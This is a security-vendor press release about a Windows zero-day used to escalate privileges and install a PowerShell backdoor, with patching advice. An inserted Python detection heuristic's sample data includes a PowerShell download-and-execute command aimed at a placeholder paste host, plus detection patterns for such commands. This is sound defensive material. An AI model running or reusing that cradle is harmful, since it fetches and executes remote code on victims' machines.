Kaspersky Lab’s automated technologies detected a previously unknown vulnerability in the Microsoft Windows operating system. It was being used by an unidentified criminal group in an attempt to gain complete control over a target device. The attack targeted the core of the system, the kernel, through a backdoor built from an essential element of the Windows operating system.
A backdoor is an extremely dangerous type of malware because it allows attackers to discreetly control infected devices for their own purposes. Such privilege escalation by a third party is usually hard to hide from security solutions. However, a backdoor that takes advantage of a previously unknown bug in the system, a zero-day vulnerability, has a far greater chance of going unnoticed. Ordinary security solutions cannot recognize the system infection, nor can they protect users from a threat that has not yet been recognized.
Kaspersky Lab’s Exploit Prevention technology, however, detected the attempt to exploit the unknown vulnerability in Microsoft Windows. The attack scenario was as follows: once the malicious .exe file was run, the malware started. The infection used the zero-day vulnerability to gain the privileges needed for persistence on the victim’s device. The malware then launched a backdoor built on a legitimate Windows feature present on every device running this operating system, the scripting framework Windows PowerShell. This allowed the attackers to blend in and avoid detection, and saved them the time needed to write their own code for malicious tools. The malware then downloaded another backdoor from a legitimate text storage service, which in turn gave the criminals total control over the infected system.
“In this attack, we noticed two main trends that we often see in advanced persistent threats (APT),” explains Anton Ivanov, security expert at Kaspersky Lab. “First of all, the use of local privilege escalation exploits to stay on the victim’s device. Secondly, the use of legitimate frameworks like Windows PowerShell for malicious activities on the victim’s device. This combination gives attackers the ability to bypass standard security solutions. To detect such techniques, the security solution must use exploit prevention technologies and behavior-based engines.”
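The behavior-based detection Ivanov refers to can be illustrated with a small heuristic. The Python script below is an added example, not code from Kaspersky Lab or from the report: it scores constructed process-creation records (the fields mirror what an EDR or Sysmon event would carry, but the records are made up for this example) for the chain the article describes, a PowerShell launch from a non-interactive parent, running with higher privileges than its parent, that pulls a further stage from a text storage service. The keyword patterns, the parent allowlist, the text-storage host list, the weights and the alert threshold are all assumptions chosen for illustration, not indicators from the page.

```python
"""Added example: a behavior-based scoring heuristic for PowerShell launches.

Not Kaspersky Lab code. All patterns, weights, allowlists and thresholds are
assumptions for illustration; the sample events are constructed, not real logs.
"""
import re
from urllib.parse import urlparse

# --- constructed sample process-creation telemetry (made up for this example) ---
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 900, "user": "CORP\\alice",
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 5012, "ppid": 4120, "user": "CORP\\alice",
     "image": r"C:\Users\alice\Downloads\invoice.exe", "cmdline": "invoice.exe"},
    # PowerShell spawned by the dropper, now running as SYSTEM after the
    # privilege escalation, hidden window, fetching a further stage from a
    # (placeholder) text-storage site.
    {"pid": 5040, "ppid": 5012, "user": "NT AUTHORITY\\SYSTEM",
     "image": PS_PATH,
     "cmdline": ('powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass '
                 '-Command "IEX (New-Object Net.WebClient).DownloadString('
                 "'https://pastebin.example/raw/abc123')\"")},
    # Benign administrative use from an interactive shell: must not alert.
    {"pid": 5088, "ppid": 4120, "user": "CORP\\alice",
     "image": PS_PATH, "cmdline": "powershell.exe Get-ChildItem C:\\logs"},
]

# --- assumed detection knobs (tune per environment) ---
PS_IMAGES = {"powershell.exe", "pwsh.exe"}
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe", "code.exe"}
TEXT_STORAGE_HOSTS = {"pastebin.example", "paste.example"}  # placeholders; fill with real services
ELEVATED_USERS = {"nt authority\\system"}
WEIGHTS = {
    "download_cradle": 2, "inline_execution": 2, "text_storage_url": 3,
    "hidden_window": 1, "policy_bypass": 1, "encoded_command": 2,
    "non_interactive_parent": 2, "privilege_jump": 3,
}
ALERT_THRESHOLD = 5

DOWNLOAD_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I)
INLINE_EXEC_RE = re.compile(r"\bIEX\b|Invoke-Expression", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS_RE = re.compile(r"-e(?:x\w*|p)\s+bypass", re.I)
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_powershell_launch(event: dict, by_pid: dict) -> tuple:
    """Return (score, reasons) for one process-creation event.

    Non-PowerShell images score 0. Parent context comes from by_pid so that
    a non-interactive parent and a user-context jump (parent unprivileged,
    child SYSTEM) can be recognised as separate signals.
    """
    if basename(event["image"]) not in PS_IMAGES:
        return 0, []
    cmd = event["cmdline"]
    reasons = []
    if DOWNLOAD_RE.search(cmd):
        reasons.append("download_cradle")
    if INLINE_EXEC_RE.search(cmd):
        reasons.append("inline_execution")
    for url in URL_RE.findall(cmd):
        if (urlparse(url).hostname or "").lower() in TEXT_STORAGE_HOSTS:
            reasons.append("text_storage_url")
            break
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden_window")
    if BYPASS_RE.search(cmd):
        reasons.append("policy_bypass")
    if ENCODED_RE.search(cmd):
        reasons.append("encoded_command")
    parent = by_pid.get(event["ppid"])
    if parent is not None:
        if basename(parent["image"]) not in INTERACTIVE_PARENTS:
            reasons.append("non_interactive_parent")
        if event["user"].lower() in ELEVATED_USERS and parent["user"].lower() not in ELEVATED_USERS:
            reasons.append("privilege_jump")
    return sum(WEIGHTS[r] for r in reasons), reasons


def detect(events: list) -> list:
    """Score every event and return those at or above ALERT_THRESHOLD."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        score, reasons = analyse_powershell_launch(e, by_pid)
        if score >= ALERT_THRESHOLD:
            findings.append({"pid": e["pid"], "score": score, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"ALERT pid={f['pid']} score={f['score']} reasons={', '.join(f['reasons'])}")
```

Only the launch spawned by the dropper crosses the threshold; the interactive `Get-ChildItem` run scores zero because every signal is tied to behavior (cradle, destination, hidden window, parent, privilege change) rather than to the mere presence of PowerShell, which is exactly why an allowlist-only approach would miss this chain while a blanket PowerShell block would be unworkable.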
Kaspersky Lab products detected the exploit as:
- HEUR:Exploit.Win32.Generic
- HEUR:Trojan.Win32.Generic
- PDM:Exploit.Win32.Generic
The vulnerability was reported to Microsoft, which released a patch for it on April 10th.
To prevent the installation of backdoors through zero-day vulnerabilities in Windows, Kaspersky Lab recommends the following security measures:
- Install the Microsoft patch for the new vulnerability as soon as possible. Once the patch is installed, attackers can no longer exploit the vulnerability.
- If you are responsible for the security of an entire organization, make sure that all software is updated as soon as a new security patch is released. Use security products with vulnerability assessment and patch management capabilities to ensure that these processes run automatically.
- Use a proven security solution with behavior-based detection capabilities, to protect against even unknown threats.
- Make sure the security team has access to the latest cyber threat intelligence. Private reports on the latest threat developments are available to Kaspersky Intelligence Reporting customers.
- Last but not least, make sure that staff are trained in the basics of IT security.
For details on the new exploit, see the full report on Securelist. To learn more about the technologies that detected this and other zero-day vulnerabilities in Microsoft Windows, a Kaspersky Lab webinar is available for on-demand viewing.